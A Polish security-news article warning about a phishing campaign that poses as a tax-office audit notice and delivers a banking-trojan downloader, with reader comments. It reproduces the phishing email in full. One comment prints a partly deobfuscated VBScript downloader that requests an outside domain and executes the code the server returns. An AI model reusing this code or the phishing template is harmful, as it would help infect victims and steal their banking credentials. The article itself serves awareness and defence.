9:29
11/6/2019

Przypominamy, że Urząd Skarbowy nie będzie Cię informował e-mailem o zamiarze wszczęcia kontroli. Jeśli otrzymałeś taką wiadomość i co gorsza kliknąłeś w załącznik, to możesz stracić swoje pieniądze, ale nie na rzecz organu pobierającego podatki, a grupy internetowych złodziejów.

Informacja o zamiarze wszczęcia kontroli

O tym ataku po raz pierwszy pisaliśmy w 2016 roku. A także 4 miesiące temu, kiedy ten sam szablon e-maila ponownie został wykorzystany do ataku na Polaków. Przestępcy zmienili wtedy tylko datę na aktualną.

Straszenie Urzędem Skarbowym chyba nieźle działa, bo dzisiejsza kampania to znów ta sama treść, co 3 lata temu ale — co ciekawe — tym razem przestępcy nie zmienili nawet daty wezwania, czym miejmy nadzieję obniżyli liczbę uważnie czytających wiadomość ofiar.

Na marginesie, bardzo podobna kampania miała miejsce także w kwietniu. Wtedy jednak przestępcy w e-mailu nie przesyłali żadnej treści. Jedynie tytuł maila był taki sam jak w powyższych przypadkach, tj. “INFORMACJA O ZAMIARZE WSZCZECIA KONTROLI SKARBOWEJ”. W kwietniu e-maile miały załączniki .html

Oto jak wygląda e-mail, jaki od wczoraj na swoje skrzynki e-mail otrzymują Polacy:

Urzad Skarbowy doreczyl zawiadomienie o zamiarze wszczecia kontroli w dniu 18.06.2016r. Wobec braku mozliwosci nawiazania kontaktu telefonicznego w dniach 3-4.06.2019r. i nie zastania podatnika w jego siedzibie w dniu 2.04.2019r. w celu ustalenia terminu wszczecia kontroli. Urzad Skarbowy wyznacza termin wszczecia kontroli na 29.04.2019r. o godz. 9.00.
Jednoczesnie Urzad Skarbowy informuje, ze zgodnie z art. 92a ustawy z dnia 13 pazdziernika 1998r. (Dz. U. z 2007 r., Nr 11, poz.74 z pózn. zm.) w zwiazku art. 80 ust. 1 ustawy z 2 lipca 2004 r. o swobodzie dzialalnosci gospodarczej (Dz. U. z 2007 r., Nr 155, poz. 1095 z pózn. zm.) czynnosci kontrolnych dokonuje sie w obecnosci kontrolowanego lub osoby przez niego upowaznionej. Oznacza to ze w wyzej wymienionym terminie jest Pani/Pan zobowiazana/y do obecnosci w siedzibie swojej Firmy i wspólpracy z inspektorem kontroli. Ponadto zgodnie z art. 80 ust. 3 ustawy o swobodzie dzialalnosci gospodarczej jest Pani/Pan zobowiazany do pisemnego wskazania osoby upowaznionej do reprezentowania Pani/Pana w trakcie kontroli, w szczególnosci w czasie Pani/Pana nieobecnosci.
Jest Pani/Pan zobowiazana/y do przygotowania wszystkich potrzebnych dokumentów zwiazanych z prowadzona przez Pania/Pana Firma wymienionych w zalaczniku.
Zalacznik do pobrania
Nieobecnosc Pani/Pana moze zostac uznana za stan wyczerpujacy znamiona wykroczenia okreslonego w art. 98 ust. 1 pkt 3 ustawy z 13 pazdziernika 1998 r. (Dz. U. z 2007 r., Nr 11, poz. 74 z pózn. zm.).
———————————–
INSPEKTOR KONTROLI
Urzad Skarbowy
mgr Marzena Fierek

Wszystkie próbki jakie do nas podesłaliście (dzięki!) były rozsyłane ze skrzynek na gmx.com i zawierały załączniki wedle formatu:

dokumentacja_XXXXX.tar

W załączniku znajduje się downloader trojana, którego jednym z celów jest przechwycenie danych dostępowy do kont bankowych i kradzież środków.

Kliknąłem — co robić, jak żyć?

Jeśli wy, lub wasi znajomi, albo co gorsza pracownicy działów księgowości otworzyli tę wiadomość, to polecamy jak najszybsze przeskanowanie komputera oprogramowaniem antywirusowym i zmianę haseł do bankowości online (wraz z przejrzeniem innych ustawień na koncie w banku i nowozainstalowanych aplikacji na telefonie osoby, która klikała w załącznik).

O tym na co zwrócić uwagę podczas wykonywania płatności w internecie, opłacania faktur i wykonywania przelewów pisaliśmy w artykule pt. 6 rad dla księgowych i każdego kto płaci w internecie online. Księgowe i resztę pracowników, którzy Wam klikają w linki i załączniki, w które klikać nie powinni możecie podesłać na nasz 3h wykład uświadamiający, który już niebawem odbędzie się w takich miastach jak:

Sami też wpadnijcie. Choć wykład prowadzony jest przystępnym dla każdego językiem, to nawet osoby techniczne wychodzą po nim zaskoczone wieloma kwestiami. Nudzić się nie będziecie, bo w trakcie wykładu pokazujemy ataki na żywo :)

Otwórz w sandboksie i wstecznie przeszukaj logi DNS

Tym bardziej technicznym radzimy też uruchomić próbkę, którą otrzymały Wasze księgowe w sandboksie i sprawdzić, dokąd malware stuka. A następnie wstecznie przejrzeć swoje logi z DNS-a. Jeśli chcielibyście wiedzieć jak sprawnie i szybko reagować na takie zagrożenia, czuli móc ustalić:

 • – czy atak który Was dotknął, to atak masowy czy ukierunkowany?
 • – co robi złośliwy załącznik (dokąd nawiązuje połączenia, jakie pliki wysyła, czy podsłuchuje klawiaturę i robi zrzuty ekranu, itp.)
 • – jakie pliki modyfikował malware i czy zagnieździł się w systemie na stałe

to zapraszamy 14-15 września na nasze szkolenie z szybkiej Analizy Malware do Warszawy oraz 5-6 września do Krakowa na szkolenie z Informatyki Śledczej. Wiedzę na obu szkoleniach przekazują wieloletni praktycy z tych dziedzin, a znajomość przekazywanych przez nich technik i narzędzi powinna być dziś obowiązkowa dla każdego firmowego administratora a nawet pracownika helpdesku, nie mówiąc już o pracownikach działów bezpieczeństwa czy SOC-ów.

PS. Zazwyczaj o takich atakach i złośliwych kampaniach e-mailowych ostrzegamy w osobnym, niewidocznym na głównej stronie Niebezpiecznika dziale “Aktywne Ataki”. Tym razem sprawę poruszyliśmy na głównej stronie z racji liczby zgłoszeń, które od Was w tej sprawie dostaliśmy. Atak wyglada na “bardzo szeroki”.


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

22 komentarzy

Dodaj komentarz
 1. Czy wystarczy samo pobranie takiego załącznika na dysk ? Czy trzeba może potem w niego kliknąć i otworzyć ?
  Czy samo kliknięcie i otworzenie okna do wyboru folderu docelowego ale potem anulowanie tego okna też zaraża komputer ?

  • Myślę, że trzeba załącznik rozpakować i uruchomić program znajdujący się w środku. Program najprawdopodobniej ikonką i nazwą będzie udawał pdf albo inny dokument.

  • Ale ciekawe w ogóle że wybrali archiwum tar. W świecie windowsa jest znacznie mniej popularne niż np rar czy ZIP. W pierwszej chwili pomyślałem sobie że to jakiś trojan dla Linuksa bo ktoś się dowiedział że z niego korzystam. Ale więcej osób tak dostało.

  • @elyah – nie wybrali tara, żeby było zabawniej, ten plik to tak naprawdę archiwum RAR ze zmienionym rozszerzeniem :D

   ubuntu-mate@ubuntu-mate:~/Pobrane$ file dokumentacja_95424.tar
   dokumentacja_95424.tar: RAR archive data, v22,
   ubuntu-mate@ubuntu-mate:~/Pobrane$ xxd -ps dokumentacja_95424.tar | head -n 1
   526172211a070100f3e182eb0b01050700060101808080002839b55f3602
   ubuntu-mate@ubuntu-mate:~/Pobrane$ echo “526172210A” | xxd -r -ps #0A moje – bo \n potrzebny :)
   Rar!
   ubuntu-mate@ubuntu-mate:~/Pobrane$

 2. W zasadzie czy złodzieje czy US to z perspektywy podatnika to samo ;)

 3. Swoboda działalności gospodarczej to również swoboda klikania w takie linki jakie się ma ochotę ;)

 4. mam nadzieję, że łobuzy nie czytają — ale ustawa o swobodzie działalności gospodarczej jest od dawna kaputt, więc już po tym można poznać, że pismo jest fejkowe

 5. Trochę zawężali sobie grono odbiorców (pewnie by antywirusy oszukać), bo typowy windows sam tar-a nie rozpakuje, a ktoś kto wie co z tarem zrobić jest bardziej świadomy ;)

  • Twierdzisz, że przeciętny użytkownik Windowsa nie ma zainstalowanego jakiegoś programu do obsługi archiwów? Z tego co kiedyś widziałem, to 7zip lub nieśmiertelna wersja trial Winrara (to drugie znacznie częściej pomimo kwestii licencyjnych… ) to standard na komputerach.

 6. Inny adres źródłowo to MetzingerIsaella97@gmx.com
  I chyba to była jakaś masówka

 7. Witam, ja również otrzymałam takiego maila, ale nauczona doświadczenie nie rozpakowałam zawartości.
  Pozdrawiam
  Anna

  • Super! :)

  • I tak trzymać!!! :-D

 8. U mnie we firmie też przyszedł taki mail. Tylko, że od razu było widać, że coś nie tak. W polu Do wyświetlał się mail yuri.yudin@sindserv.sumy.ua, a wysyłano z maila Urzad Skarbowy . Taka ciekawostka ;)

 9. Ściągnąłem, rozpakowałem, wyciąłem sedem z koślawego skryptu VBE wszystkie zbędne “:” (niezbędne może nawet też :P)

  Pomijając biografię jakiegoś arabskiego szejka (czy kogokolwiek)
  jest tam:
  Function sdposscnacci(N)
  If N flowerssVarS
  Bookss_Connect
  Wend

  function lopmslsddamsa(haipsHTTP)
  On Error Resume Next
  If haipsHTTP.Status = 90+110 Then
  hilossTestS()
  else
  tropmssZeror
  End If
  If haipsHTTP.Status = 90+210 Then
  hilossTestS()
  else
  tropmssZeror()
  End If
  end function

  Function hilossTestS()
  On Error Resume Next
  ExecuteGlobal “” + anussresponse + “”
  vimnsldsdsains()

  End Function

  Function tropmssZeror()
  On Error Resume Next
  End Function

  Sub floutsdcupd()
  Dim chilosMyArray
  liloasdomain = “ht”&”tps://hitekpo.in”&”fo”
  End Sub

  Function costaricataskaka()
  Dim chilosMyArray
  costaricataskaka = “Mi” &”cros”&”oft.XM”&”LHT”&”TP”
  End Function

  Function klopsdfsdcstaskaka()
  costaricataskaka = “M”&”icr”&”osoft.XM”&”LH”&”TTP”
  End Function

  Sub vimnsldsdsains()
  floutsdcupd()
  End Sub

  Sub Bookss_Connect()
  On Error Resume Next
  Dim aslanXMLHTTP, memiosudsssdxcosl
  cennoskssMilos(memiosudsssdxcosl)
  memiosudsssdxcosl = costaricataskaka()
  memiosudsssdxcosl = klopsdfsdcstaskaka()
  Set aslanXMLHTTP = CreateObject(memiosudsssdxcosl)
  aslanXMLHTTP.Open teddossxxops, liloasdomain, False
  aslanXMLHTTP.Send faiksopMilos
  anussresponse = aslanXMLHTTP.responseText
  lopmslsddamsa(aslanXMLHTTP)
  End Sub

  Function kFunction()

  End Function

  Function oFunction()

  End Function
  ‘95424

  #[repeated NNx] to moje uwagi.
  Odwiedziłem https://hitekpo.info
  a nawet https://hitekpo.info?id=03333tr12
  ale oprócz “startówki” Nginxa to tam nic ciekawego nie widzę (mój błąd, że robiłem to z Firefoxa)

  Jakieś sugestie jak się z tym dalej pobawić cURLem ktoś, coś? :D

 10. @Mati, dokładnie tak. Nie pamietam czy była to ta sąma domena.
  @Niebezpiecznik, czy to tylko niewinna zabawa, czy warto próbkę przesłać do CERTu ? Pytam bo coraz więcej osób “technicznych” śledzi wasze wpisy i takie info byłoby mega wartościowe.

  No i pozdrawiam, dalszych sukcesów życzę!

 11. Dostałem coś takiego, ale bez załącznika, nie postarali się : Urzad Skarbowy doreczyl zawiadomienie o zamiarze wszczecia kontroli w dniu 19.06.2019r.

  Do dnia dzisiejszego nie zostala uiszczona brakujaca kwota po rozliczeniu zeznania podatkowego za 2018 r.

  Zalegla kwote 10,63 zl – slownie (dziesiec zlotych, 63 grosze) nalezy niezwlocznie przelac na konto urzedu:

  46 2360 0018 0107 0000 0003 8360

  W tytule wpisujac nazwe urzedu skarbowego, podanego w zeznaniu podatkowym.

  Brak wplaty moze zostaz uznana za stan wyczerpujacy znamiona wykroczenia okreslonego w art. 98 ust. 1 pkt 3 ustawy z 13 pazdziernika 1998 r. (Dz. U. z 2007 r., Nr 11, poz. 74 z pózn. zm.).

 12. GMX.com to chyba “przykrywka” pod sporą część maili “z Urzędu Skarbowego”. Na mojej poczcie (home.pl) nadawca to mings7kewish@gmax.com. Niby poszło do spamu, ale faktycznie było – przyszło wczoraj ;).

 13. Literówka – nadawca ma tą samą końcówkę, której użyłam na początku komentarza (GMX).

 14. Tak jak napisał Mati, plik vbs łączy się po http i HTTPS że stroną chyba ninjas.info czy jakoś tak (pisze teraz z głowy bo robiłem test w czwartek) i pobierał z tamtad wpis w vbs z poleceniem Sleep i jakaś cyfra. Tak jakby to było przygotowanie do ataku.

 15. Znajoma dostała dwa dni temu. Oczywiście otworzyła załącznik. Dzwoni do mnie po dwóch dniach, że nie ma internetu i wyskakuje jej jakieś okno cały czas, które próbuje zamknąć a nie może. I zdziwiona, że chyba ma jakiegoś wirusa.

  Ktoś “otwierał” załącznik i wie co dalej trzeba zrobić? Albo jak daleko wirus zabrnął? Bo z artykułu nic nie wynika. Głównie tylko to, żeby nie otwierać podejrzanego meila. A skanowanie “zwykłym” antywirusem, który jest zainstalowany na zainfekowanym kompie coś da?!

 16. Wybaczcie za pytanie jeśli kogoś urazi, ale informatyka nie jest moją mocną stroną :) Czy wystarczy kliknięcie załącznika, czy kliknięcie i pobranie? Z góry dziękuję za odpowiedz.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: